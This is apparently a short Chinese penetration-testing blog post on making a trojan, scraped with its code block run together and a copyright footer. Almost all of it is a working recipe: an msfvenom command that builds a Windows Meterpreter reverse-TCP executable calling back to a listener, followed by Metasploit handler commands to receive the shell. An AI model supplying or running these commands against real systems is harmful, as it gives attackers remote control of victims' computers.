1234567copyroot@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=4444 -f exe > shell.exeuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.44.128set lport 4444exploit msf 渗透测试 author: John Doe link: http://example.com/2024/02/26/木马制作/ Copyright notice: All articles on this website, unless otherwise stated, adopt CC BY-NC-ND 4.0 reprint policy. If reproduced, please indicate source!